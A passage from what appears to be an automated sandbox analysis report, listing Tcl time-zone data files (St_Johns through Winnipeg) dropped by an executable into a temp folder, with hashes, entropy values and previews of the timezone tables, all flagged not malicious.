                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Johns) {. {-9223372036854775808 -12652 0 LMT}. {-2713897748 -12652 0 NST}. {-1664130548 -9052 1 NDT}. {-1650137348 -12652 0 NST}. {-1640982548 -12652 0 NST}. {-1632076148 -9052 1 NDT}. {-1615145348 -12652 0 NST}. {-1609446548 -12652 0 NST}. {-1598650148 -9052 1 NDT}. {-1590100148 -12652 0 NST}. {-1567286948 -9052 1 NDT}. {-1551565748 -12652 0 NST}. {-1535837348 -9052 1 NDT}. {-1520116148 -12652 0 NST}. {-1503782948 -9052 1 NDT}. {-1488666548 -12652 0 NST}. {-1472333348 -9052 1 NDT}. {-1457216948 -12652 0 NST}. {-1440883748 -9052 1 NDT}. {-1425767348 -12652 0 NST}. {-1409434148 -9052 1 NDT}. {-1394317748 -12652 0 NST}. {-1377984548 -9052 1 NDT}. {-1362263348 -12652 0 NST}. {-1346534948 -9052 1 NDT}. {-1330813748 -12652 0 NST}. {-1314480548 -9052 1 NDT}. {-1299364148 -12652 0 NST}. {-1283030948 -9052 1 NDT}. {-1267914548 -12652 0 NS

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\St_Kitts

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                                                                                    Entropy (8bit):4.878034750755565
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290tMp490e/:MBaIMY9QpI290g490O
                                                                                                                                                                                                                                                    MD5:B149DC2A23F741BA943E5511E35370D3
                                                                                                                                                                                                                                                    SHA1:3C8D3CFDB329B7ECB90C19D3EB3DE6F33A063ADD
                                                                                                                                                                                                                                                    SHA-256:36046A74F6BB23EA8EABA25AD3B93241EBB509EF1821CC4BEC860489F5EC6DCA
                                                                                                                                                                                                                                                    SHA-512:CEB38EC2405A3B0A4E09CDD2D69A11884CCB28DA0FD7CF8B344E1472642A0571674D3ED33C639E745DDEEE741E52B0948B86DFFFD324BB07A9F1A6B9F38F898E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Kitts) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\St_Lucia

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                                                                                    Entropy (8bit):4.89157166321909
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0uPXoFVAIg20uPXhF2IAcGEtkS+IAcGEuPX/:SlSWB9IZaM3y7eoFVAIgpeX290tY90e/
                                                                                                                                                                                                                                                    MD5:7B7FCA150465F48FAC9F392C079B6376
                                                                                                                                                                                                                                                    SHA1:1B501288CC00E8B90A2FAD82619B49A9DDBE4475
                                                                                                                                                                                                                                                    SHA-256:87203A4BF42B549FEBF467CC51E8BCAE01BE1A44C193BED7E2D697B1C3D268C9
                                                                                                                                                                                                                                                    SHA-512:5E4F7EE08493547A012144884586D45020D83B5838254C257FD341B8B6D3F9E279013D068EFC7D6DF7569DDD20122B3B23E9C93A0017FB64E941A50311ED1F18
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Lucia) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\St_Thomas

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):204
                                                                                                                                                                                                                                                    Entropy (8bit):4.888871207225013
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290tXIMFJ490e/:MBaIMY9QpI290tJ490O
                                                                                                                                                                                                                                                    MD5:7E272CE31D788C2556FF7421F6832314
                                                                                                                                                                                                                                                    SHA1:A7D89A1A9AC2B61D98690126D1E4C1595E160C8F
                                                                                                                                                                                                                                                    SHA-256:F0E10D45C929477A803085B2D4CE02EE31FD1DB24855836D02861AD246BC34D9
                                                                                                                                                                                                                                                    SHA-512:CCDF0B1B5971B77F6FA27F25900DB1AB9A4A4C69E15DCDF4EA35E1E1FC31AAD957C2E5862B411B0155BB1E25E2DD417A89168295317B1E603DA59142D76CE80A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Thomas) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\St_Vincent

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):205
                                                                                                                                                                                                                                                    Entropy (8bit):4.876306758637305
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290tzb+Q90e/:MBaIMY9QpI290xyQ90O
                                                                                                                                                                                                                                                    MD5:52DAAF1636B5B70E0BA2015E9F322A74
                                                                                                                                                                                                                                                    SHA1:4BD05207601CF6DB467C27052EBB25C9A64DAC96
                                                                                                                                                                                                                                                    SHA-256:A5B3687BBA1D14D52599CB355BA5F4399632BF98DF4CEB258F9C479B1EA73586
                                                                                                                                                                                                                                                    SHA-512:E3DE0447236F6EA24D173CCB46EA1A4A31B5FFBCE2A442CD542DA8C54DAD22391FD1CA301776C0FB07CBCF256FC708E61B7BBA682C02EEBE03BECCEA2B6D3BD0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Vincent) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Swift_Current

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):845
                                                                                                                                                                                                                                                    Entropy (8bit):4.182525430299964
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQce7eUFLxsOCX+FmFyyFDVFdPFxFZA8uFZYV:5NecLGO+6yZzXDZA8KZG
                                                                                                                                                                                                                                                    MD5:1502A6DD85B55B9619E42D1E08C09738
                                                                                                                                                                                                                                                    SHA1:70FF58E29CCDB53ABABA7EBD449A9B34AC152AA6
                                                                                                                                                                                                                                                    SHA-256:54E541D1F410AFF34CE898BBB6C7CC945B66DFC9D7C4E986BD9514D14560CC6F
                                                                                                                                                                                                                                                    SHA-512:99F0EFF9F2DA4CDD6AB508BB85002F38B01BDFDE0CBA1EB2F4B5CA8EAD8AAB645A3C26BECF777DE49574111B37F847EFF9320331AC07E84C8E892B688B01D36B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Swift_Current) {. {-9223372036854775808 -25880 0 LMT}. {-2030201320 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-747241200 -21600 0 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}. {-702489600 -25200 0 MST}. {-684342000 -21600 1 MDT}. {-671040000 -25200 0 MST}. {-652892400 -21600 1 MDT}. {-639590400 -25200 0 MST}. {-631126800 -25200 0 MST}. {-400086000 -21600 1 MDT}. {-384364800 -25200 0 MST}. {-337186800 -21600 1 MDT}. {-321465600 -25200 0 MST}. {-305737200 -21600 1 MDT}. {-292435200 -25200 0 MST}. {-273682800 -21600 1 MDT}. {-260985600 -25200 0 MST}. {73472400 -21600 0 CST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Tegucigalpa

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):329
                                                                                                                                                                                                                                                    Entropy (8bit):4.580220354026118
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X5290Em2OHskeRbV1UcgdrV/uFn/acD3/uFn/sb9/uFn/yn:MBp5290EmdHsVH1UDB/uFn/z/uFn/k/N
                                                                                                                                                                                                                                                    MD5:004588073FADF67C3167FF007759BCEA
                                                                                                                                                                                                                                                    SHA1:64A6344776A95E357071D4FC65F71673382DAF9D
                                                                                                                                                                                                                                                    SHA-256:55C18EA96D3BA8FD9E8C4F01D4713EC133ACCD2C917EC02FD5E74A4E0089BFBF
                                                                                                                                                                                                                                                    SHA-512:ADC834C393C5A3A7BFD86A933E7C7F594AC970A3BD1E38110467A278DC4266D81C3E96394C102E565F05DE7FBBDA623C673597E19BEC1EA26AB12E4354991066
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tegucigalpa) {. {-9223372036854775808 -20932 0 LMT}. {-1538503868 -21600 0 CST}. {547020000 -18000 1 CDT}. {559717200 -21600 0 CST}. {578469600 -18000 1 CDT}. {591166800 -21600 0 CST}. {1146981600 -18000 1 CDT}. {1154926800 -21600 0 CST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Thule

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6666
                                                                                                                                                                                                                                                    Entropy (8bit):3.7481713130223295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:pJunToVmM7IEc2fVGYu2yeB/T/eleWmBk81kS/kV6kef4zjyvUP/ZbJitpJxSIRj:pAWJv
                                                                                                                                                                                                                                                    MD5:8FFE81344C31A51489A254DE97E83C3E
                                                                                                                                                                                                                                                    SHA1:4397D9EDAC304668D95921EF03DFD90F967E772F
                                                                                                                                                                                                                                                    SHA-256:EF6AF4A3FA500618B37AF3CDD40C475E54347D7510274051006312A42C79F20C
                                                                                                                                                                                                                                                    SHA-512:F34A6D44499DE5A4E328A8EAFBA5E77B1B8C04A843160D74978398F1545C821C3034FCBD5ADBFAD8D14D1688907C57E7570023ABD3096D4E4C19E3D3C04428B3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thule) {. {-9223372036854775808 -16508 0 LMT}. {-1686079492 -14400 0 AST}. {670399200 -10800 1 ADT}. {686120400 -14400 0 AST}. {701848800 -10800 1 ADT}. {717570000 -14400 0 AST}. {733903200 -10800 1 ADT}. {752043600 -14400 0 AST}. {765352800 -10800 1 ADT}. {783493200 -14400 0 AST}. {796802400 -10800 1 ADT}. {814942800 -14400 0 AST}. {828856800 -10800 1 ADT}. {846392400 -14400 0 AST}. {860306400 -10800 1 ADT}. {877842000 -14400 0 AST}. {891756000 -10800 1 ADT}. {909291600 -14400 0 AST}. {923205600 -10800 1 ADT}. {941346000 -14400 0 AST}. {954655200 -10800 1 ADT}. {972795600 -14400 0 AST}. {986104800 -10800 1 ADT}. {1004245200 -14400 0 AST}. {1018159200 -10800 1 ADT}. {1035694800 -14400 0 AST}. {1049608800 -10800 1 ADT}. {1067144400 -14400 0 AST}. {1081058400 -10800 1 ADT}. {1099198800 -14400 0 AST}. {1112508000 -10800 1 ADT}. {1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Thunder_Bay

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8058
                                                                                                                                                                                                                                                    Entropy (8bit):3.7473289441354263
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:hePraC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:hirrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:CE6E17F16AA8BAD3D9DB8BD2E61A6406
                                                                                                                                                                                                                                                    SHA1:7DF466E7BB5EDD8E1CDF0ADC8740248EF31ECB15
                                                                                                                                                                                                                                                    SHA-256:E29F83A875E2E59EC99A836EC9203D5ABC2355D6BD4683A5AEAF31074928D572
                                                                                                                                                                                                                                                    SHA-512:833300D17B7767DE74E6F2757513058FF5B25A9E7A04AB97BBBFFAC5D9ADCC43366A5737308894266A056382D2589D0778EEDD85D56B0F336C84054AB05F1079
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thunder_Bay) {. {-9223372036854775808 -21420 0 LMT}. {-2366733780 -21600 0 CST}. {-1893434400 -18000 0 EST}. {-883594800 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {18000 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {126248400 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Tijuana

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8470
                                                                                                                                                                                                                                                    Entropy (8bit):3.7667993951223955
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:mb4I5mC2ZCAFBWsBNwj/lpmlOxGcKcnRH31t+ucgge:y5DaYaNwj/lpmlOxnKcndIG
                                                                                                                                                                                                                                                    MD5:F993E030963356E9BABBAB56F68C8B2F
                                                                                                                                                                                                                                                    SHA1:779A79ACFCA2BA0E81A00E65D9CE0E6A2C0C5C18
                                                                                                                                                                                                                                                    SHA-256:937C3B2FE7DA094E755AFB8CE9E97CF512E50C4F2086740BB57A77F0EA2BEC3E
                                                                                                                                                                                                                                                    SHA-512:11F2F0FF2629EF30F61C8681BB28415F594A0CFD1930770B4F71C1E69AA615B25BDE5D9CCB167183F66C52BB921408847D6FEF9A4EB3951C8E1BC3577E33CB0B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tijuana) {. {-9223372036854775808 -28084 0 LMT}. {-1514736000 -25200 0 MST}. {-1451667600 -28800 0 PST}. {-1343062800 -25200 0 MST}. {-1234803600 -28800 0 PST}. {-1222963200 -25200 1 PDT}. {-1207242000 -28800 0 PST}. {-873820800 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-761677200 -28800 0 PST}. {-686073600 -25200 1 PDT}. {-661539600 -28800 0 PST}. {-504892800 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {-337183200 -25200 1 PDT}. {-323881200 -28800 0 PST}. {-305733600 -25200 1 PDT}. {-292431600 -28800 0 PST}. {-283968000 -28800 0 PST}. {189331200 -28800 0 PST}. {199274400 -25200 1 PDT}. {21560

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Toronto

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10883
                                                                                                                                                                                                                                                    Entropy (8bit):3.7202964099536917
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:9wUYG1dbgZ8UMrEUWraC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:9wS1dbgZ8UMrVWrrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:9C60AFDFA3BA2002BA68673B778194CF
                                                                                                                                                                                                                                                    SHA1:D6D17C82AEC4B85BA7B0F6FCB36A7582CA26A82B
                                                                                                                                                                                                                                                    SHA-256:7744DB6EFE39D636F1C88F8325ED3EB6BF8FA615F52A60333A58BCE579983E87
                                                                                                                                                                                                                                                    SHA-512:3C793BB00725CF37474683EAB70A0F2B2ACAE1656402CDD7E75182988DC20361A8651A624A5220983E3E05333B9817DCBEAF20D34BD55C5128F55474A02A9455
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Toronto) {. {-9223372036854775808 -19052 0 LMT}. {-2366736148 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1609441200 -18000 0 EST}. {-1601753400 -14400 1 EDT}. {-1583697600 -18000 0 EST}. {-1567357200 -14400 1 EDT}. {-1554667200 -18000 0 EST}. {-1534698000 -14400 1 EDT}. {-1524074400 -18000 0 EST}. {-1503248400 -14400 1 EDT}. {-1492365600 -18000 0 EST}. {-1471798800 -14400 1 EDT}. {-1460916000 -18000 0 EST}. {-1440954000 -14400 1 EDT}. {-1428861600 -18000 0 EST}. {-1409504400 -14400 1 EDT}. {-1397412000 -18000 0 EST}. {-1378054800 -14400 1 EDT}. {-1365962400 -18000 0 EST}. {-1346605200 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-1220806800

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Tortola

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):202
                                                                                                                                                                                                                                                    Entropy (8bit):4.854311472609309
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290RRKl290e/:MBaIMY9QpI290V90O
                                                                                                                                                                                                                                                    MD5:B931564D937C807282F1432FF6EA52A6
                                                                                                                                                                                                                                                    SHA1:7ECA025D97717EEA7C91B5390122D3A47A25CAD0
                                                                                                                                                                                                                                                    SHA-256:FF5CF153C4EC65E7E57A608A481F12939B6E4ACC8D62C5B01FEB5A04769A6F07
                                                                                                                                                                                                                                                    SHA-512:97271500C7D7959B90A6AC0A98D5D0D29DA00E92F9FC973594267DF906DEE767243698DBA2F3A0CF00156E949E29CDDD45A151F263583514090717CFDF1FB4DD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Tortola) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Vancouver

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9495
                                                                                                                                                                                                                                                    Entropy (8bit):3.7630000632404426
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:2f7f/5LB6xi9C7Nf+aNwj/lpmlOxnKcndIG:2f735LB6xi9cfefnK6
                                                                                                                                                                                                                                                    MD5:1ACC41DA124C0CA5E67432760FDC91EC
                                                                                                                                                                                                                                                    SHA1:13F56C3F53076E0027BB8C5814EC81256A37F4AF
                                                                                                                                                                                                                                                    SHA-256:DFC19B5231F6A0AB9E9B971574FB612695A425A3B290699DF2819D46F1250DB0
                                                                                                                                                                                                                                                    SHA-512:2F2E358F5743248DE946B90877EFCCCACAF039956249F17D24B7DA026830A181A125045E2C8937A6ACD674E32887049F2D36A1941F09803DF514ADCDA4055CC5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Vancouver) {. {-9223372036854775808 -29548 0 LMT}. {-2713880852 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-747237600 -25200 1 PDT}. {-732726000 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Virgin

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):201
                                                                                                                                                                                                                                                    Entropy (8bit):4.901732290886438
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290RXgr490e/:MBaIMY9QpI290xg090O
                                                                                                                                                                                                                                                    MD5:DEB77B4016D310DFB38E6587190886FB
                                                                                                                                                                                                                                                    SHA1:B308A2D187C153D3ED821B205A4F2D0F73DA94B0
                                                                                                                                                                                                                                                    SHA-256:A6B8CFE8B9381EC61EAB553CFA2A815F93BBB224A6C79D74C08AC54BE4B8413B
                                                                                                                                                                                                                                                    SHA-512:04A0D598A24C0F3A1881D3412352F65C610F75281CC512B46248847A798A12AEA551E3DE9EA3FD5BB6B3687A0BB65746392F301F72746876D30697D66B3A3604
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Virgin) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Whitehorse

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7613
                                                                                                                                                                                                                                                    Entropy (8bit):3.789738507183991
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:hmD+C2ZCHtffWsBNwj/lpmlOxGcKcnRH31t+ucgge:hm3Nf+aNwj/lpmlOxnKcndIG
                                                                                                                                                                                                                                                    MD5:CBCFD98E08FCCEB580F66AFE8E670AF5
                                                                                                                                                                                                                                                    SHA1:7E922CCD99CD7758709205E4C9210A2F09F09800
                                                                                                                                                                                                                                                    SHA-256:72992080AA9911184746633C7D6E47570255EE85CC6FE5E843F62331025B2A61
                                                                                                                                                                                                                                                    SHA-512:18290654E5330186B739DEDBC7D6860FD017D089DAE19E480F868E1FB56A3CF2E685D0099C4CF1D4F2AE5F36D0B72ABE52FBAC29AD4F6AB8A45C4C420D90E2D5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Whitehorse) {. {-9223372036854775808 -32412 0 LMT}. {-2188997988 -32400 0 YST}. {-1632056400 -28800 1 YDT}. {-1615125600 -32400 0 YST}. {-1596978000 -28800 1 YDT}. {-1583164800 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-147884400 -25200 1 YDDT}. {-131554800 -32400 0 YST}. {315561600 -28800 0 PST}. {325677600 -25200 1 PDT}. {341398800 -28800 0 PST}. {357127200 -25200 1 PDT}. {372848400 -28800 0 PST}. {388576800 -25200 1 PDT}. {404902800 -28800 0 PST}. {420026400 -25200 1 PDT}. {436352400 -28800 0 PST}. {452080800 -25200 1 PDT}. {467802000 -28800 0 PST}. {483530400 -25200 1 PDT}. {499251600 -28800 0 PST}. {514980000 -25200 1 PDT}. {530701200 -28800 0 PST}. {544615200 -25200 1 PDT}. {562150800 -28800 0 PST}. {576064800 -25200 1 PDT}. {594205200 -28800 0 PST}. {607514400 -25200 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Winnipeg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9379
                                                                                                                                                                                                                                                    Entropy (8bit):3.7354364023000937
